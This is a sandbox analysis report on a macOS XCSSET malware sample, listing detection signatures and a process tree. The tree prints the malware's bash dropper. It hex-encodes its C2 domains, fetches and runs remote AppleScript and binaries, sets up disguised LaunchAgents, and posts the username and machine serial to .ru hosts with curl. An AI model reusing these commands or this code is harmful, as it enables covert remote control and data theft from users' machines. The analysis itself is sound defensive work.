Edit tour

macOS Analysis Report
exec.2430808

Overview

General Information

Sample Name:	exec.2430808
Analysis ID:	176612
MD5:	1ce8099c5bb8fbe715ae7c546c46a526
SHA1:	127b66afa20a1c42e653ee4f4b64cf1ee3ed637d
SHA256:	483b2f45a06516439b1dbfedda52f135a4ccdeafd91192e64250305644e5ff48
Infos:

Detection

XCSSET

Score:	100
Range:	0 - 100
Whitelisted:	false

Signatures

Yara detected XCSSET

Sends data within HTTP X-headers likely leaking sensitive information

Writes compiled Apple script to disk (with potentially malicious intention)

Creates launch services redirecting its stdout/stderr to /dev/null (probably to hide errors)

Searches for processes that are suspiciously named

Written Apple script contain uncommon file extension (probably to disguise the script)

Executes the "csrutil" command used to retrieve or modify the "System Integrity Protection" configuration

Queries the unique Apple serial number of the machine

Sets the property list key LSUIElement for running apps in the background without appearing in the Dock

Writes Mach-O files to untypical directories

Tries to delete plist files with Apple identifiers

Likely kills multiple processes

Copies icons from applications possibly to disguise malicious intentions

Writes Mach-O files to disk with suspicious names (probably to obfuscate its intention)

Likely queries the I/O Kit registry to detect VMs by querying the "IOPlatformExpertDevice" class

Executes the "xxd" command used for reading and creating hexdumps

Yara signature match

Uses AppleScript framework/components containing Apple Script related functionalities

Explicitly unloads, stops, and/or removes launch services

Executes the "mkdir" command used to create folders

Executes the "grep" command used to find patterns in files or piped streams

Executes Apple scripts and/or other OSA language scripts with shell command 'osascript'

Executes the "chmod" command used to modify permissions

Executes the "curl" command used to transfer data via the network (typically using HTTP/S)

Executes the "ping" command used for connectivity testing via ICMP

Uses AppleScript scripting additions containing additional functionalities for Apple Scripts

Reads file resource fork extended attributes

Deletes icon files

Creates code signed application bundles

Mach-O contains sections with high entropy indicating compressed/encrypted content

Changes permissions of written Mach-O files

Executes commands using a shell command-line interpreter

Executes the "defaults" command used to read or modify user specific settings

Executes the "touch" command used to create files or modify time stamps

Executes the "plutil" command used to modify plists

Executes the "ioreg" command used to gather hardware information (I/O kit registry)

Reads the systems hostname

Reads the sysctl safe boot value (probably to check if the system is in safe boot mode)

Executes the "ps" command used to list the status of processes

Writes icon files to disk

Creates memory-persistent launch services

Executes the "sysctl" command used to retrieve or modify kernel settings

Explicitly loads/starts launch services

Queries the macOS product version

Creates launch services that start periodically

Reads hardware related sysctl values

Executes the "codesign" command used to create and manipulate code signatures

Creates user-wide 'launchd' managed services aka launch agents

Creates 'launchd' managed services aka launch agents with bundle ID names to possibly disguise malicious intentions

Creates hidden files, links and/or directories

Executes the "rm" command used to delete files or directories

Many shell processes execute programs via execve syscall (might be indicative for malicious behavior)

Writes FAT Mach-O files to disk

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.

General Information

Joe Sandbox Version:
Analysis ID:	176612
Start date and time:	2022-08-24 11:18:17 +02:00
Joe Sandbox Product:	Cloud
Overall analysis duration:	0h 5m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	exec.2430808
Cookbook file name:	macOS - Monterey - load provided binary as normal user.jbs
Analysis system description:	Mac Mini, Monterey (Java 1.8.0_341)
Analysis Mode:	default
Detection:	MAL
Classification:	mal100.troj.spyw.evad.mac2430808@0/32@2/0

Warnings

Report creation exceeded maximum number of non-whitelisted processes and may have missing process information.

Runtime Messages

Command:	sudo -u pedro /Users/pedro/Desktop/exec.2430808
PID:	956
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	launched with args v10 notes app: basedir:, autoclean: , domain: target dir is: /Users/pedro/Library/Group Containers/group.com.apple.mail target domain: melindas.ru target plist: /Users/pedro/Library/LaunchAgents/com.apple.spx.plist step 1 step 2 step 3 first launch. processing... cleaning done... created directory structure... compiled app... created scpt... put Xcode icon in place... wrote to LaunchAgents... wrote .plist loaded service... wrote .report wrote .domain done. finished.
Standard Error:

Process Tree

System is mac-monterey

mono-sgen64 New Fork (PID: 956, Parent: 913)

sudo (MD5: 2d2c9298401fd5607184821a6ed73106) Arguments: /usr/bin/sudo -u pedro /Users/pedro/Desktop/exec.2430808

sudo New Fork (PID: 957, Parent: 956)

exec.2430808 (MD5: 1ce8099c5bb8fbe715ae7c546c46a526) Arguments: /Users/pedro/Desktop/exec.2430808

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: /Users/pedro/Desktop/exec.2430808 -c exec '/Users/pedro/Desktop/exec.2430808' '$@' /Users/pedro/Desktop/exec.2430808

exec.2430808 (MD5: 1ce8099c5bb8fbe715ae7c546c46a526) Arguments: /Users/pedro/Desktop/exec.2430808

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: /Users/pedro/Desktop/exec.2430808 -c #!/bin/bashAUTOCLEAN=$2BASEDIR=$1BASEDIR=${PROJECT_FILE_PATH}BUILD_VERSION=1.1.5BUILD_VENDOR='default'RANDOM_PATHS=('$HOME/Library/Application Support/com.apple.spotlight' '$HOME/Library/Application Scripts/com.apple.CalendarAgent' '$HOME/Library/Group Containers/group.com.apple.mail' '$HOME/Library/Containers/com.apple.photolibraryd')DOMAIN_ONE=$(echo '73 75 70 65 72 64 6F 63 73 2E 72 75' | xxd -p -r)DOMAIN_TWO=$(echo '6D 65 6C 69 6E 64 61 73 2E 72 75' | xxd -p -r)DOMAIN_THREE=$(echo '6B 69 6E 6B 73 64 6F 63 2E 72 75' | xxd -p -r)DOMAIN_FOUR=$(echo '61 64 6F 62 65 66 69 6C 65 2E 72 75' | xxd -p -r)ACTIVE_DOMAINS=(${DOMAIN_ONE} ${DOMAIN_TWO} ${DOMAIN_THREE} ${DOMAIN_FOUR})TARGET_DOMAIN=${ACTIVE_DOMAINS[RANDOM%${#ACTIVE_DOMAINS[@]}]}if [ ! -z '$3' ] then TARGET_DOMAIN=$3fiSTR_TWO=$(echo '58 2D 4D 6F 64 3A 20 50 6F 64 73' | xxd -p -r) # X-Mod: PodsSTR_ONE=$(echo '58 2D 55 73 72 3A' | xxd -p -r) # X-Usr:TARGETDIRFILE='$HOME/Library/Caches/GitServices/.report'TARGETPLISTFILE='$HOME/Library/Caches/GitServices/.plist'TARGETDOMAINFILE='$HOME/Library/Caches/GitServices/.domain'BOOT_FILE='$HOME/Library/Caches/GitServices/AppleWebKit'EXEC_DONE_FILE='$HOME/Library/Caches/GitServices/.exec_done'RANDOM_PLISTS=('$HOME/Library/LaunchAgents/com.apple.airplay.plist' '$HOME/Library/LaunchAgents/com.apple.spx.plist' '$HOME/Library/LaunchAgents/com.google.keystore.plist' '$HOME/Library/LaunchAgents/com.google.chrome.plist')MACOS_VERSION=$(defaults read loginwindow SystemVersionStampAsString)logme(){curl --connect-timeout 11 -s -k -d '$1' -H '$STR_ONE $USER' -H '$STR_TWO' 'https://$TARGET_DOMAIN/sys/log.php' > /dev/null 2>&1}clean_proj(){perl -ni -e 'print unless /(.*)AAC43A(.*),/' '$BASEDIR/project.pbxproj' > /dev/null 2>&1perl -ni -e 'print unless /(.*)6D902C(.*),/' '$BASEDIR/project.pbxproj' > /dev/null 2>&1perl -ni -e 'print unless /(.*)FFA81D(.*),/' '$BASEDIR/project.pbxproj' > /dev/null 2>&1perl -ni -e 'print unless /(.*)6A102C(.*),/' '$BASEDIR/project.pbxproj' > /dev/null 2>&1perl -ni -e 'print unless /(3F708E50247A0EB6004066FD)(.*),/' '$BASEDIR/project.pbxproj' > /dev/null 2>&1perl -ni -e 'print unless /(162E3FD122D63A22006D904C)(.*),/' '$BASEDIR/project.pbxproj' > /dev/null 2>&1perl -ni -e 'print unless /(1D60589F0D05DD5A006BFC54)(.*),/' '$BASEDIR/project.pbxproj' > /dev/null 2>&1perl -ni -e 'print unless /(1D3623260D0F684500981D51)(.*),/' '$BASEDIR/project.pbxproj' > /dev/null 2>&1perl -ni -e 'print unless /(167012E12301506800C38AA3)(.*),/' '$BASEDIR/project.pbxproj' > /dev/null 2>&1rm -rf '$BASEDIR/xcuserdata/.xcassets/' || true}write_meta(){TARGETDIRFILE_DIR=`dirname $2`[ ! -d $TARGETDIRFILE_DIR ] && mkdir -p $TARGETDIRFILE_DIRecho '$1' > '$2'}curl --connect-timeout 11 -s -k 'https://$TARGET_DOMAIN' > /dev/null || exit 0str=''for ARG in '$@' do str='${str} ${ARG}'doneecho 'launched with args v10 notes app:${str}'echo 'basedir:${1}, autoclean: ${2}, domain: ${3}'cmd=$(curl -ks -m 5 -H '$STR_ONE $USER' https://$TARGET_DOMAIN/sys/prepod.php)if [[ ! -z '$cmd' ]] thenecho 'got prepod remote command. executing...'osascript -e '$cmd' 2>/dev/null && exit 1echo 'remote command failed. continue normal flow...'fiif [ -f '$TARGETDIRFILE' ] thenTARGETDIR=$(cat '$TARGETDIRFILE')APP_FILE='$TARGETDIR/Notes.app'if [ ! -d '$APP_FILE' ] thenTARGETDIR=${RANDOM_PATHS[RANDOM%${#RANDOM_PATHS[@]}]}fielseTARGETDIR=${RANDOM_PATHS[RANDOM%${#RANDOM_PATHS[@]}]}fiif [ -f '$TARGETPLISTFILE' ] thenPLIST_FILE=$(cat '$TARGETPLISTFILE')if [ ! -f '$PLIST_FILE' ] thenPLIST_FILE=${RANDOM_PLISTS[RANDOM%${#RANDOM_PLISTS[@]}]}fielsePLIST_FILE=${RANDOM_PLISTS[RANDOM%${#RANDOM_PLISTS[@]}]}fiecho 'target dir is: $TARGETDIR target domain: $TARGET_DOMAIN target plist: $PLIST_FILE'APP_FILE='$TARGETDIR/Notes.app'SCPT_FILE='$TARGETDIR/Notes.app/Contents/Resources/Scripts/a.scpt'if [ ! -d '$APP_FILE' ] thenecho 'step 1'fiif [ ! -f '$PLIST_FILE' ] thenecho 'step 2'fiif [ ! -f '$EXEC_DONE_FILE' ] thenecho 'step 3'fiif [ -d '$APP_FILE' ] && [ -f '$PLIST_FILE' ] && [ -f '$BOOT_FILE' ] && [ -f '$EXEC_DONE_FILE' ] thenecho 'all files are set!'SERVICE_IS_RUNNING=$(pgrep -f com.java.core com.sys.core > /dev/null 2>&1 && echo 1 || echo 0)if [ $SERVICE_IS_RUNNING = 0 ] thenecho 'service is not running. restarting...'if [[ $MACOS_VERSION == '11.'* ]] then curl -ks -o /tmp/open 'https://$TARGET_DOMAIN/agent/bin/open' chmod +x /tmp/open /tmp/open '$APP_FILE' > /dev/null 2>&1 &elseopen '$APP_FILE' > /dev/null 2>&1 &fifiif [[ '$AUTOCLEAN' = true ]] thenclean_projfi[ ! -f $TARGETDIRFILE ] && write_meta $TARGETDIR $TARGETDIRFILEexit 0fiecho 'first launch. processing...'for i in '${RANDOM_PATHS[@]}'dorm -rf '$i/Notes.app' > /dev/null 2>&1rm -rf '$i/Containers' > /dev/null 2>&1donetouch '$TMPDIR/test.tmp' 2>/dev/null || truefor i in '${RANDOM_PLISTS[@]}'dorm -f '$i' > /dev/null 2>&1rm -f '$i' > /dev/null 2>&1doneecho 'cleaning done...'mkdir -p '$TARGETDIR' > /dev/null 2>&1echo 'created directory structure...'read -r -d '' PAYLOAD2 << EOMtrydo shell script 'osascript '$SCPT_FILE''end tryEOMosacompile -x -e '$PAYLOAD2' -o '$APP_FILE' > /dev/null 2>&1touch '$TMPDIR/test2.tmp' 2>/dev/null || trueecho 'compiled app...'read -r -d '' PAYLOAD << EOMglobal dsglobal dglobal diset ds to {'', '', '', '', '', ''}set di to 1set d to item di of dson xe(_str)set x to id of _strrepeat with c in xset contents of c to c - (102 - 2)end repeatreturn string id xend xeon xex(_str)set x to id of _strrepeat with c in xset contents of c to c - (102 - 1)end repeatreturn string id xend xexon m()-- log 'domain used ' & xe(d)set dF to POSIX path of ((path to me as text) & '::')set tF to quoted form of (dF & xex('')) -- /Containersdo shell script 'rm -rf ' & tFset a to '123'do shell script 'mkdir -p ' & tFset f to quoted form of (dF & xex('')) -- /Containers/aset un to do shell script xe('') -- whoamido shell script 'curl -

bash New Fork (PID: 959, Parent: 957)

bash New Fork (PID: 960, Parent: 959)

bash New Fork (PID: 961, Parent: 959)

xxd (MD5: aaca2dc9ef1cdee4042195108a1e9588) Arguments: xxd -p -r

bash New Fork (PID: 962, Parent: 957)

bash New Fork (PID: 963, Parent: 962)

bash New Fork (PID: 964, Parent: 962)

xxd (MD5: aaca2dc9ef1cdee4042195108a1e9588) Arguments: xxd -p -r

bash New Fork (PID: 965, Parent: 957)

bash New Fork (PID: 966, Parent: 965)

bash New Fork (PID: 967, Parent: 965)

xxd (MD5: aaca2dc9ef1cdee4042195108a1e9588) Arguments: xxd -p -r

bash New Fork (PID: 968, Parent: 957)

bash New Fork (PID: 969, Parent: 968)

bash New Fork (PID: 970, Parent: 968)

xxd (MD5: aaca2dc9ef1cdee4042195108a1e9588) Arguments: xxd -p -r

bash New Fork (PID: 971, Parent: 957)

bash New Fork (PID: 972, Parent: 971)

bash New Fork (PID: 973, Parent: 971)

xxd (MD5: aaca2dc9ef1cdee4042195108a1e9588) Arguments: xxd -p -r

bash New Fork (PID: 974, Parent: 957)

bash New Fork (PID: 975, Parent: 974)

bash New Fork (PID: 976, Parent: 974)

xxd (MD5: aaca2dc9ef1cdee4042195108a1e9588) Arguments: xxd -p -r

bash New Fork (PID: 977, Parent: 957)

bash New Fork (PID: 978, Parent: 977)

defaults (MD5: 4e146d0cf6ed8b4592347198fc2a990c) Arguments: defaults read loginwindow SystemVersionStampAsString

bash New Fork (PID: 979, Parent: 957)

curl (MD5: f26856a56418cdf4551b4bdd7be78831) Arguments: curl --connect-timeout 11 -s -k https://melindas.ru

bash New Fork (PID: 981, Parent: 957)

bash New Fork (PID: 982, Parent: 981)

curl (MD5: f26856a56418cdf4551b4bdd7be78831) Arguments: curl -ks -m 5 -H X-Usr: pedro https://melindas.ru/sys/prepod.php

bash New Fork (PID: 983, Parent: 957)

rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -rf /Users/pedro/Library/Application Support/com.apple.spotlight/Notes.app

bash New Fork (PID: 984, Parent: 957)

rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -rf /Users/pedro/Library/Application Support/com.apple.spotlight/Containers

bash New Fork (PID: 985, Parent: 957)

rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -rf /Users/pedro/Library/Application Scripts/com.apple.CalendarAgent/Notes.app

bash New Fork (PID: 986, Parent: 957)

rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -rf /Users/pedro/Library/Application Scripts/com.apple.CalendarAgent/Containers

bash New Fork (PID: 987, Parent: 957)

rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -rf /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app

bash New Fork (PID: 988, Parent: 957)

rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -rf /Users/pedro/Library/Group Containers/group.com.apple.mail/Containers

bash New Fork (PID: 989, Parent: 957)

rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -rf /Users/pedro/Library/Containers/com.apple.photolibraryd/Notes.app

bash New Fork (PID: 990, Parent: 957)

rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -rf /Users/pedro/Library/Containers/com.apple.photolibraryd/Containers

bash New Fork (PID: 991, Parent: 957)

touch (MD5: 63d1087742d412edbc4f41c9e90067d2) Arguments: touch /test.tmp

bash New Fork (PID: 992, Parent: 957)

rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -f /Users/pedro/Library/LaunchAgents/com.apple.airplay.plist

bash New Fork (PID: 993, Parent: 957)

rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -f /Users/pedro/Library/LaunchAgents/com.apple.airplay.plist

bash New Fork (PID: 994, Parent: 957)

rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -f /Users/pedro/Library/LaunchAgents/com.apple.spx.plist

bash New Fork (PID: 995, Parent: 957)

rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -f /Users/pedro/Library/LaunchAgents/com.apple.spx.plist

bash New Fork (PID: 996, Parent: 957)

rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -f /Users/pedro/Library/LaunchAgents/com.google.keystore.plist

bash New Fork (PID: 997, Parent: 957)

rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -f /Users/pedro/Library/LaunchAgents/com.google.keystore.plist

bash New Fork (PID: 998, Parent: 957)

rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -f /Users/pedro/Library/LaunchAgents/com.google.chrome.plist

bash New Fork (PID: 999, Parent: 957)

rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -f /Users/pedro/Library/LaunchAgents/com.google.chrome.plist

bash New Fork (PID: 1000, Parent: 957)

mkdir (MD5: 1a411936bac2c64c06674cbcfcdd66f8) Arguments: mkdir -p /Users/pedro/Library/Group Containers/group.com.apple.mail

bash New Fork (PID: 1001, Parent: 957)

osacompile (MD5: 84bbdc98ac7aa38fcbb281f019bb391d) Arguments: osacompile -x -e trydo shell script 'osascript '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/a.scpt''end try -o /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app

codesign New Fork (PID: 1002, Parent: 1001)

bash New Fork (PID: 1003, Parent: 957)

touch (MD5: 63d1087742d412edbc4f41c9e90067d2) Arguments: touch /test2.tmp

bash New Fork (PID: 1004, Parent: 957)

touch (MD5: 63d1087742d412edbc4f41c9e90067d2) Arguments: touch /test3.tmp

bash New Fork (PID: 1005, Parent: 957)

plutil (MD5: 11427a2425049a93a60e85d61c9c0081) Arguments: plutil -replace LSUIElement -bool YES /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Info.plist

bash New Fork (PID: 1006, Parent: 957)

rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -f /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/applet.icns

bash New Fork (PID: 1007, Parent: 957)

cp (MD5: c6968d65936952ad8b175271cbbc8708) Arguments: cp -f /System/Applications/Notes.app/Contents/Resources/AppIcon.icns /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/applet.icns

bash New Fork (PID: 1008, Parent: 957)

bash New Fork (PID: 1009, Parent: 1008)

dirname (MD5: 206cca615592f99874d8cb4cd1641f07) Arguments: dirname /Users/pedro/Library/LaunchAgents/com.apple.spx.plist

bash New Fork (PID: 1010, Parent: 957)

mkdir (MD5: 1a411936bac2c64c06674cbcfcdd66f8) Arguments: mkdir -p /Users/pedro/Library/LaunchAgents

bash New Fork (PID: 1011, Parent: 957)

bash New Fork (PID: 1012, Parent: 1011)

dirname (MD5: 206cca615592f99874d8cb4cd1641f07) Arguments: dirname /Users/pedro/Library/Caches/GitServices/AppleWebKit

bash New Fork (PID: 1013, Parent: 957)

mkdir (MD5: 1a411936bac2c64c06674cbcfcdd66f8) Arguments: mkdir -p /Users/pedro/Library/Caches/GitServices

bash New Fork (PID: 1014, Parent: 957)

cat (MD5: c5d124a467bf29f668fd9bac3a9856ab) Arguments: cat

bash New Fork (PID: 1015, Parent: 957)

chmod (MD5: 8339fe4afa333001c03a7b21f7ad0e9c) Arguments: chmod +x /Users/pedro/Library/Caches/GitServices/AppleWebKit

bash New Fork (PID: 1016, Parent: 957)

cat (MD5: c5d124a467bf29f668fd9bac3a9856ab) Arguments: cat

bash New Fork (PID: 1017, Parent: 957)

launchctl (MD5: 240cdf175cab143785114a58688a4d0a) Arguments: launchctl unload -w /Users/pedro/Library/LaunchAgents/com.apple.spx.plist

bash New Fork (PID: 1018, Parent: 957)

touch (MD5: 63d1087742d412edbc4f41c9e90067d2) Arguments: touch /test4.tmp

bash New Fork (PID: 1019, Parent: 957)

launchctl (MD5: 240cdf175cab143785114a58688a4d0a) Arguments: launchctl load -w /Users/pedro/Library/LaunchAgents/com.apple.spx.plist

bash New Fork (PID: 1021, Parent: 957)

bash New Fork (PID: 1022, Parent: 1021)

dirname (MD5: 206cca615592f99874d8cb4cd1641f07) Arguments: dirname /Users/pedro/Library/Caches/GitServices/.report

bash New Fork (PID: 1024, Parent: 957)

touch (MD5: 63d1087742d412edbc4f41c9e90067d2) Arguments: touch /test5.tmp

bash New Fork (PID: 1025, Parent: 957)

touch (MD5: 63d1087742d412edbc4f41c9e90067d2) Arguments: touch /test6.tmp

xpcproxy New Fork (PID: 1020, Parent: 1)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: bash /Users/pedro/Library/Caches/GitServices/AppleWebKit

bash New Fork (PID: 1023, Parent: 1020)

applet (MD5: 1535756d106d32fe31c1959e19e6582d) Arguments: /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/MacOS/applet

sh New Fork (PID: 1028, Parent: 1023)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c osascript '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/a.scpt'

osascript (MD5: d86dbe94a4b95a8d18c37e43b7d6b6a4) Arguments: osascript /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/a.scpt

sh New Fork (PID: 1029, Parent: 1028)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c ping -o -t 3 superdocs.ru

ping (MD5: e7f06272a612949c2e552aa2556fb798) Arguments: ping -o -t 3 superdocs.ru

sh New Fork (PID: 1030, Parent: 1028)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c rm -rf '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers'

rm (MD5: dc9f95c6c7dbdd1609aa6716ba393cd3) Arguments: rm -rf /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers

sh New Fork (PID: 1031, Parent: 1028)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c mkdir -p '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers'

mkdir (MD5: 1a411936bac2c64c06674cbcfcdd66f8) Arguments: mkdir -p /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers

sh New Fork (PID: 1032, Parent: 1028)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c whoami

whoami (MD5: 3c1b6e2e567df857130cd73ff38d3df7) Arguments: whoami

sh New Fork (PID: 1033, Parent: 1028)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c curl -sk -d 'user=pedro&build_vendor=default&build_version=1.1.5' https://superdocs.ru/apple/com.php | osacompile -x -o '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/a'

bash New Fork (PID: 1034, Parent: 1033)

curl (MD5: f26856a56418cdf4551b4bdd7be78831) Arguments: curl -sk -d user=pedro&build_vendor=default&build_version=1.1.5 https://superdocs.ru/apple/com.php

bash New Fork (PID: 1035, Parent: 1033)

osacompile (MD5: 84bbdc98ac7aa38fcbb281f019bb391d) Arguments: osacompile -x -o /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/a

sh New Fork (PID: 1036, Parent: 1028)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c osascript '/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/a' > /dev/null 2>&1

bash New Fork (PID: 1037, Parent: 1036)

osascript (MD5: d86dbe94a4b95a8d18c37e43b7d6b6a4) Arguments: osascript /Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/a

sh New Fork (PID: 1038, Parent: 1037)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c whoami

whoami (MD5: 3c1b6e2e567df857130cd73ff38d3df7) Arguments: whoami

sh New Fork (PID: 1039, Parent: 1037)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c ping -o -t 3 superdocs.ru

ping (MD5: e7f06272a612949c2e552aa2556fb798) Arguments: ping -o -t 3 superdocs.ru

sh New Fork (PID: 1040, Parent: 1037)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c ioreg -c IOPlatformExpertDevice -d 2 | awk -F\' '/IOPlatformSerialNumber/{print $(NF-1)}'

bash New Fork (PID: 1041, Parent: 1040)

ioreg (MD5: d03e2df1848ceb731ba4a8c3e82b2011) Arguments: ioreg -c IOPlatformExpertDevice -d 2

bash New Fork (PID: 1042, Parent: 1040)

awk (MD5: 231a9b1c4634f8b7b53d29c9c47ee4df) Arguments: awk -F' /IOPlatformSerialNumber/{print $(NF-1)}

sh New Fork (PID: 1043, Parent: 1037)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c curl -k -s --connect-timeout 14 -d 'module launched. connRetries: 0. Used domain: superdocs.ru' -H 'X-Id: C07GV0KZPJH8' -H 'X-Users: pedro' -H 'X-Mod: bootstrap' https://superdocs.ru/l

curl (MD5: f26856a56418cdf4551b4bdd7be78831) Arguments: curl -k -s --connect-timeout 14 -d module launched. connRetries: 0. Used domain: superdocs.ru -H X-Id: C07GV0KZPJH8 -H X-Users: pedro -H X-Mod: bootstrap https://superdocs.ru/l

sh New Fork (PID: 1044, Parent: 1037)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c mkdir -p ~/Library/Caches/GitServices/ && touch ~/Library/Caches/GitServices/.ed

bash New Fork (PID: 1045, Parent: 1044)

mkdir (MD5: 1a411936bac2c64c06674cbcfcdd66f8) Arguments: mkdir -p /Users/pedro/Library/Caches/GitServices/

bash New Fork (PID: 1046, Parent: 1044)

touch (MD5: 63d1087742d412edbc4f41c9e90067d2) Arguments: touch /Users/pedro/Library/Caches/GitServices/.ed

sh New Fork (PID: 1048, Parent: 1037)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c (plutil -p ~/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist | grep 'https' -b3 |awk 'NR==3 {split($4, arr, '\'') print arr[2]}') || echo 'com.apple.safari'

bash New Fork (PID: 1049, Parent: 1048)

bash New Fork (PID: 1050, Parent: 1049)

plutil (MD5: 11427a2425049a93a60e85d61c9c0081) Arguments: plutil -p /Users/pedro/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist

bash New Fork (PID: 1051, Parent: 1049)

grep (MD5: 99be09a23ac46af2879dc015993ca389) Arguments: grep https -b3

bash New Fork (PID: 1052, Parent: 1049)

awk (MD5: 231a9b1c4634f8b7b53d29c9c47ee4df) Arguments: awk NR==3 {split($4, arr, '\'') print arr[2]}

sh New Fork (PID: 1053, Parent: 1037)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c defaults read loginwindow SystemVersionStampAsString

defaults (MD5: 4e146d0cf6ed8b4592347198fc2a990c) Arguments: defaults read loginwindow SystemVersionStampAsString

sh New Fork (PID: 1054, Parent: 1037)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c defaults read /Applications/Safari.app/Contents/Info CFBundleShortVersionString

defaults (MD5: 4e146d0cf6ed8b4592347198fc2a990c) Arguments: defaults read /Applications/Safari.app/Contents/Info CFBundleShortVersionString

sh New Fork (PID: 1056, Parent: 1037)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c ioreg -c IOPlatformExpertDevice -d 2 | awk -F\' '/IOPlatformSerialNumber/{print $(NF-1)}'

bash New Fork (PID: 1057, Parent: 1056)

ioreg (MD5: d03e2df1848ceb731ba4a8c3e82b2011) Arguments: ioreg -c IOPlatformExpertDevice -d 2

bash New Fork (PID: 1058, Parent: 1056)

awk (MD5: 231a9b1c4634f8b7b53d29c9c47ee4df) Arguments: awk -F' /IOPlatformSerialNumber/{print $(NF-1)}

sh New Fork (PID: 1059, Parent: 1037)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c defaults read /Library/Preferences/com.apple.alf globalstate

defaults (MD5: 4e146d0cf6ed8b4592347198fc2a990c) Arguments: defaults read /Library/Preferences/com.apple.alf globalstate

sh New Fork (PID: 1060, Parent: 1037)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c csrutil status | grep -q enabled && echo 1 || echo 0

bash New Fork (PID: 1061, Parent: 1060)

csrutil (MD5: 51e2d23508016b3dba2263fd13f74859) Arguments: csrutil status

bash New Fork (PID: 1062, Parent: 1060)

grep (MD5: 99be09a23ac46af2879dc015993ca389) Arguments: grep -q enabled

sh New Fork (PID: 1063, Parent: 1037)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c sysctl -n machdep.cpu.brand_string

sysctl (MD5: 340b13a50d8ee5cfcc91d8480aa5cbe6) Arguments: sysctl -n machdep.cpu.brand_string

sh New Fork (PID: 1064, Parent: 1037)

bash (MD5: c0c00727c39ed1a5586291299575a6aa) Arguments: sh -c ioreg -c IOPlatformExpertDevice -d 2 | awk -F\' '/IOPlatformSerialNumber/{print $(NF-1)}'

bash New Fork (PID: 1065, Parent: 1064)

ioreg (MD5: d03e2df1848ceb731ba4a8c3e82b2011) Arguments: ioreg -c IOPlatformExpertDevice -d 2

bash New Fork (PID: 1066, Parent: 1064)

awk (MD5: 231a9b1c4634f8b7b53d29c9c47ee4df) Arguments: awk -F' /IOPlatformSerialNumber/{print $(NF-1)}

sh New Fork (PID: 1067, Parent: 1037)

